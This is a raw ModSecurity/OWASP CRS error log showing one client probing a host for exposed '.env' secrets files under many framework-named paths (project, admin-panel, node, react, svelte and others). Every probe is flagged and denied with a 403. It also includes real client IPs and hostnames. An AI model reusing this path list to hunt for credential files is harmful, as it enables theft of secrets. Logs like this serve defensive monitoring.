[Mon May 11 17:22:56.271366 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNpQAAAAI"]
[Mon May 11 17:22:56.271863 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNpQAAAAI"]
[Mon May 11 17:22:56.272089 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNpQAAAAI"]
[Mon May 11 17:22:56.426906 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/admin-panel/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNpgAAAAI"]
[Mon May 11 17:22:56.427393 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/admin-panel/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNpgAAAAI"]
[Mon May 11 17:22:56.427604 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/admin-panel/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNpgAAAAI"]
[Mon May 11 17:22:56.582098 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /control-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/control-panel/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNpwAAAAI"]
[Mon May 11 17:22:56.582619 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/control-panel/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNpwAAAAI"]
[Mon May 11 17:22:56.582852 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/control-panel/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNpwAAAAI"]
[Mon May 11 17:22:56.737315 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/user-panel/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNqAAAAAI"]
[Mon May 11 17:22:56.737797 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/user-panel/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNqAAAAAI"]
[Mon May 11 17:22:56.738034 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/user-panel/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNqAAAAAI"]
[Mon May 11 17:22:56.893792 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNqQAAAAI"]
[Mon May 11 17:22:56.894296 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNqQAAAAI"]
[Mon May 11 17:22:56.894528 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNqQAAAAI"]
[Mon May 11 17:22:57.048723 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /express/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/express/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNqgAAAAI"]
[Mon May 11 17:22:57.049223 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/express/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNqgAAAAI"]
[Mon May 11 17:22:57.049467 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/express/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNqgAAAAI"]
[Mon May 11 17:22:57.173549 2026] [security2:error] [pid 1411099:tid 1411108] [client 43.165.170.119:53018] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "ventes-privees-auto.fr"] [uri "/"] [unique_id "agH0UQ-Qm4vhlWBPlMjNqwAAAAc"]
[Mon May 11 17:22:57.206869 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/next/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNrAAAAAI"]
[Mon May 11 17:22:57.207379 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/next/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNrAAAAAI"]
[Mon May 11 17:22:57.207629 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/next/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNrAAAAAI"]
[Mon May 11 17:22:57.362066 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/nuxt/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNrQAAAAI"]
[Mon May 11 17:22:57.362588 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/nuxt/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNrQAAAAI"]
[Mon May 11 17:22:57.362840 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/nuxt/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNrQAAAAI"]
[Mon May 11 17:22:57.516831 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/nest/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNrgAAAAI"]
[Mon May 11 17:22:57.517335 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/nest/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNrgAAAAI"]
[Mon May 11 17:22:57.517583 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/nest/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNrgAAAAI"]
[Mon May 11 17:22:57.671699 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/react/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNrwAAAAI"]
[Mon May 11 17:22:57.672208 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/react/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNrwAAAAI"]
[Mon May 11 17:22:57.672450 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/react/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNrwAAAAI"]
[Mon May 11 17:22:57.831752 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/vue/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNsAAAAAI"]
[Mon May 11 17:22:57.832225 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/vue/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNsAAAAAI"]
[Mon May 11 17:22:57.832445 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/vue/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNsAAAAAI"]
[Mon May 11 17:22:57.987860 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/angular/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNsQAAAAI"]
[Mon May 11 17:22:57.988380 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/angular/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNsQAAAAI"]
[Mon May 11 17:22:57.988615 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/angular/.env"] [unique_id "agH0UQ-Qm4vhlWBPlMjNsQAAAAI"]
[Mon May 11 17:22:58.142771 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/svelte/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNsgAAAAI"]
[Mon May 11 17:22:58.143286 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/svelte/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNsgAAAAI"]
